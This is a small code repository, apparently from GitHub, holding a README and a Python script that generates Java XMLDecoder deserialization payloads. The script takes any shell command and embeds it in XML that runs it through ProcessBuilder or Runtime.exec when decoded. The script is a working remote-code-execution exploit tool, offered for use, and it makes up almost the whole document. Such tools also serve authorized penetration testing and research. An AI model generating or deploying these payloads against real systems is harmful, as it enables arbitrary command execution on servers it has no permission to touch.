├── Java-XMLDecoder.png
├── README.md
└── XMLDecoder-payload-generator.py


/Java-XMLDecoder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mhaskar/XMLDecoder-payload-generator/256f2032e88a13fe5879fcadda1f55072419a3fc/Java-XMLDecoder.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # XMLDecoder payload generator
2 | A simple python script to generate XML payloads works for Java XMLDecoder based on ProcessBuilder and Runtime exec.
3 | 
4 | You can use this script to generate XML payloads which you can use with XMLDecoder java function.
5 | 
6 | 
7 | ![XMLDecoder](Java-XMLDecoder.png)
8 | 


--------------------------------------------------------------------------------
/XMLDecoder-payload-generator.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | 
 4 | payload_template_processbuilder = '<?xml version="1.0" encoding="UTF-8"?> <java version="1.7.0_21" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="{0}">Template</array> <void method="start" id="process"> </void> </void> </java>'
 5 | payload_template_runtime = '<?xml version="1.0" encoding="UTF-8"?> <java version="1.7.0_21" class="java.beans.XMLDecoder"> <object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <array class="java.lang.String" length="{0}"> Template </array> </void> </object> </java>'
 6 | 
 7 | 
 8 | command = input("command >>")
 9 | print("\n")
10 | print("1) ProcessBuilder")
11 | print("2) Runtime Exec\n")
12 | template = input("execution method (please choose 1 or 2) >> ")
13 | 
14 | if template != "1" and template != "2":
15 |     print("Wrong execution method")
16 | 
17 | command_tokens = command.split()
18 | command_length = len(command_tokens)
19 | main_executable = command_tokens[0]
20 | xml_arguments = []
21 | index = 0
22 | 
23 | 
24 | def save_payload(payload):
25 |     f = open("payload.xml", "w")
26 |     f.write(final_payload)
27 |     f.close()
28 |     print("[+] Your payload saved to payload.xml")
29 |     exit()
30 | 
31 | 
32 | for argument in command_tokens:
33 |     xml_argument = '<void index="{0}"><string>{1}</string></void>'.format(index, argument)
34 |     xml_arguments.append(xml_argument)
35 |     index = index + 1
36 | 
37 | final_xml_arguments = "".join(xml_arguments)
38 | 
39 | if template == "1":
40 |     payload = payload_template_processbuilder.replace("Template", final_xml_arguments)
41 |     final_payload = payload.format(command_length)
42 |     save_payload(final_payload)
43 | 
44 | elif template == "2":
45 |     payload = payload_template_runtime.replace("Template", final_xml_arguments)
46 |     final_payload = payload.format(command_length)
47 |     save_payload(final_payload)
48 | 


--------------------------------------------------------------------------------